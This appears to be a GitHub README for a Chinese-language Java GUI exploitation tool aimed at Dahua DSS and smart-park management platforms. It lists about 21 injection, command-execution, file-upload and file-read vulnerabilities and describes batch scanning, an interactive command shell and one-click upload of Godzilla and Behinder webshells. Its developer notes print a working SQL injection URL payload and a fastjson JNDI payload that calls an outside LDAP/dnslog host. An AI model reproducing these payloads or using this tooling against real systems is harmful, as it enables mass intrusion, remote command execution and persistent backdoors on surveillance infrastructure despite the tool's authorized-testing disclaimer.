Skip to content

MInggongK/dahuaExploitGUI

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 

Repository files navigation

dahua综合漏洞利用工具

没事写个工具,程序采用java开发,环境JDK 1.8 声明:仅用于授权测试,用户滥用造成的一切后果和作者无关 请遵守法律法规!

https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html

dahua综合漏洞利用工具 收录漏洞如下:

大华DSS数字监控系统attachment_clearTempFile.action注入漏洞

大华DSS数字监控系统远程命令执行漏洞

大华DSS数字监控系统itcBulletin注入漏洞

大华智慧园区综合管理平台信息泄露漏洞

大华智慧园区综合管理平台getNewStaypointDetailQuery注入漏洞

大华智慧园区综合管理平台clientserver注入

大华DSS user_edit.action信息泄露漏洞

大华智慧园区综合管理平台poi任意文件上传漏洞

大华智慧园区综合管理平台video任意文件上传漏洞

大华智慧园区综合管理平台emap任意文件上传漏洞

大华智慧园区综合管理平台searchJson注入漏洞

大华DSS数字监控系统attachment_getAttList.action注入漏洞

大华智能物联综合管理平台justForTest用户登录漏洞

大华智慧园区综合管理平台sendFaceInfo远程命令执行漏洞

大华智慧园区综合管理平台deleteFtp远程命令执行漏洞

大华EIMS-capture_handle远程命令执行漏洞

大华智能物联综合管理平台random远程命令执行漏洞

大华智慧园区综合管理平台ipms命令执行漏洞

大华智能物联综合管理平台env信息泄露漏洞

大华ICC智能物联综合管理平台readpic任意文件读取漏洞

大华DSS数字监控系统任意文件读取漏洞

功能介绍

一键检测模块,选择模块

批量检测模块: 模块如下:

大华DSS数字监控系统远程命令执行漏洞

大华智慧园区综合管理平台信息泄露漏洞

大华智能物联综合管理平台justForTest用户登录漏洞

大华DSS数字监控系统attachment_clearTempFile.action注入漏洞

大华DSS数字监控系统itcBulletin注入漏洞

大华智慧园区综合管理平台clientserver注入

大华智慧园区综合管理平台searchJson注入漏洞

大华智慧园区综合管理平台poi任意文件上传漏洞

大华智慧园区综合管理平台video任意文件上传漏洞

大华智慧园区综合管理平台sendFaceInfo远程命令执行漏洞

大华智慧园区综合管理平台deleteFtp远程命令执行漏洞

大华EIMS-capture_handle远程命令执行漏洞

大华智能物联综合管理平台random远程命令执行漏洞

大华智慧园区综合管理平台ipms命令执行漏洞

CMDshell模块 大华DSS数字监控系统远程命令执行漏洞

大华智慧园区综合管理平台sendFaceInfo远程命令执行漏洞

大华智慧园区综合管理平台deleteFtp远程命令执行漏洞

大华智慧园区综合管理平台ipms命令执行漏洞

根据程序版本优化,添加新版本的Poc

webshell利用模块

大华智慧园区综合管理平台poi任意文件上传漏洞

大华智慧园区综合管理平台video任意文件上传漏洞

大华智慧园区综合管理平台emap任意文件上传漏洞

功能使用

默认模块可一键扫描所有漏洞

image

image

image

image

选择模块可单独选择你要检测的模块,输入目标,点击选择模块即可检测漏洞 ,批量检测内置路径:/url.txt 文本放入你要检测的网站列表 默认检测,为了防止网络阻塞

image

注:默认检测只检测大华DSS数字监控系统远程命令执行漏洞 下载dahuaExploitGUI程序,当前目录新建文本,命名为url.txt,文本放入你要检测的网站列表,选择批量检测模块,即可开始检测

cmdshell模块

image

选择模块进行漏洞验证,如果存在,在cmdshell输入你要执行的命令即可

webshell利用模块:

image

内置Godzilla Behinder jspcmdshell 三种类型的shell 一个测试文件

具体使用方法:选择模块进行验证 如video漏洞存在 可选择内置类型,如测试文件 点击video getshell上传即可 如果存在video漏洞 可选择内置shell, 点击video getshell上传即可

如存在emap上传漏洞,可上传测试

image

image

编写小记

踩坑之处,判断注入的精准技巧 大华智慧园区综合管理平台searchJson注入漏洞 默认payload: portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20user()),0x7e),1)--%22%7D/extend/%7B%7D 判断PAYLOAD: 使用md5(123456) portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(123456)),0x7e),1)--%22%7D/extend/%7B%7D 得到结果 e10adc3949ba59abbe56e057f20f883 是SOAP的XML数据发送

坑点:由于页面是错误500异常,一访问就进行了try捕获异常 如果你在判断外进行获取数据,是不行的

错误写法: 程序执行结束 while ((lines = errorReader.readLine()) != null) { errorResponse.append(lines); }

           if (errorResponse.toString().contains("e10adc3949ba59abbe56e057f20f883")) {

判断初始化的500页面 正常写法,判断内执行: if (responseCode == 500) { while ((lines = errorReader.readLine()) != null) { errorResponse.append(lines); }

            //   test1.appendText(errorResponse.toString());

            if (errorResponse.toString().contains("e10adc3949ba59abbe56e057f20f883")) {

关于ceye漏洞判断精准的问题 ipms漏洞 默认payload: {"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://" + randomNumber + "." + ml.getText() + "", "autoCommit": true} 这里还是做了一个随机生成 ml.setText(randomNumber + "." + ml.getText()); String a; a = ml.getText();

            然后通过
             if (response.toString().contains(ml.getText())) {

进行判断回显 可能网络会造成卡顿,因为调用了两个方法 稳妥的做法: test1.appendText("\n" + "随机为:" + a + "请人工检查" + "\n"); 这个a就是随机生成后的如xxx.902323.dnslog.cn

版本更新日志

dahuaExploitGUI v2.4版

优化了大华DSS user_edit.action信息泄露漏洞

优化了多目录的去重处理

优化了多请求线程执行问题

dahuaExploitGUI v2.3版

增加了大华智能物联综合管理平台env模块检测

增加了大华ICC智能物联综合管理平台readpic任意文件读取模块检测

增加了大华DSS数字监控系统任意文件读取模块检测

批量检测模块,默认只输出存在漏洞的网站